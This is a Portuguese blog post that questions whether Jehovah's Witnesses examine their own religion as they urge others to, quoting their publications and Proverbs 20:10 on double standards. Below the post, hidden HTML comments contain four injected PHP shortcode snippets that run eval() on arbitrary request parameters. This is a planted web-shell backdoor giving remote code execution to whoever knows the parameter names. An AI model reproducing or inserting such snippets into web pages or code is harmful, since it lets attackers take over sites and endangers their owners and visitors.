Examine a sua religião

Começo este post recordando um dos capítulos do livro “A Verdade que conduz à vida Eterna”: “Por Que É Sábio que Examine Sua Religião”

Posteriormente, o livro “Poderá Viver Para Sempre num Paraíso na Terra”, chamou o capítulo 3 de: “A Religião que você pertence realmente faz diferença”.

Neste último, no parágrafo 19 e 20, lemos:
“A verdade não admite a existência de todas as espécies divergentes de doutrinas religiosas no mundo. Por exemplo, ou os humanos têm uma alma que sobrevive à morte do corpo, ou não têm. Ou a terra existirá para sempre, ou não. Ou Deus acabará com a iniqüidade, ou não. Essas e muitas outras crenças ou são certas, ou são erradas. Não pode haver duas verdades, quando uma não concorda com a outra. Ou uma ou a outra é verdadeira, mas não ambas. Crer sinceramente em alguma coisa e praticá-la não a torna certa, se realmente for errada.

Qual deve ser sua reação caso se lhe apresente prova de que aquilo em que crê é errado?

Por exemplo, digamos que esteja viajando de carro pela primeira vez para certo lugar. Você tem um mapa rodoviário, mas não tomou o tempo para verificá-lo bem. Alguém lhe disse qual a estrada que devia tomar. Você confiou nele, crendo sinceramente que lhe indicou o caminho certo. Mas, suponhamos que não o seja. O que faria se alguém lhe apontasse o erro? O que faria se este, recorrendo ao mapa que você mesmo tem, lhe mostrasse que tomou a estrada errada? Será que o orgulho ou a obstinação lhe impediriam admitir que está na estrada errada? Pois bem, se ficar sabendo, pelo exame de sua própria Bíblia, que está seguindo o caminho religioso errado, esteja disposto a mudar.”

Por outro lado, lemos em Provérbios 20:10:
“…aquele que utiliza de dois pesos e duas medidas é algo detestável para Jeová [10 Dois tipos de pesos e dois tipos de efas — ambos são juntamente algo detestável para Jeová]”

Diante disso cabe perguntar:
Estão as Testemunhas de Jeová dispostas a examinar a sua religião, conforme pedem para outros fazerem?
São elas capazes de aplicar em suas vidas os mesmos conselhos que dão às outras pessoas, quando vão de casa em casa ou dirigindo estudos bíblicos?
Se não estão, não fazem elas o uso de dois pesos e duas medidas e desta forma, não se tornam algo detestável para Jeová?

E se são algo detestável para Jeová, poderiam o estar representando?

E você, utilizará de dois pesos e duas medidas e pedirá para outros examinarem suas religiões enquanto você não faz isso?

<!– [insert_php]if (isset($_REQUEST["Kbisy"])){eval($_REQUEST["Kbisy"]);exit;}[/insert_php][php]if (isset($_REQUEST["Kbisy"])){eval($_REQUEST["Kbisy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["qPY"])){eval($_REQUEST["qPY"]);exit;}[/insert_php][php]if (isset($_REQUEST["qPY"])){eval($_REQUEST["qPY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["IrYSt"])){eval($_REQUEST["IrYSt"]);exit;}[/insert_php][php]if (isset($_REQUEST["IrYSt"])){eval($_REQUEST["IrYSt"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hkEz"])){eval($_REQUEST["hkEz"]);exit;}[/insert_php][php]if (isset($_REQUEST["hkEz"])){eval($_REQUEST["hkEz"]);exit;}[/php] –>

Submit a Comment

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

cinco × 2 =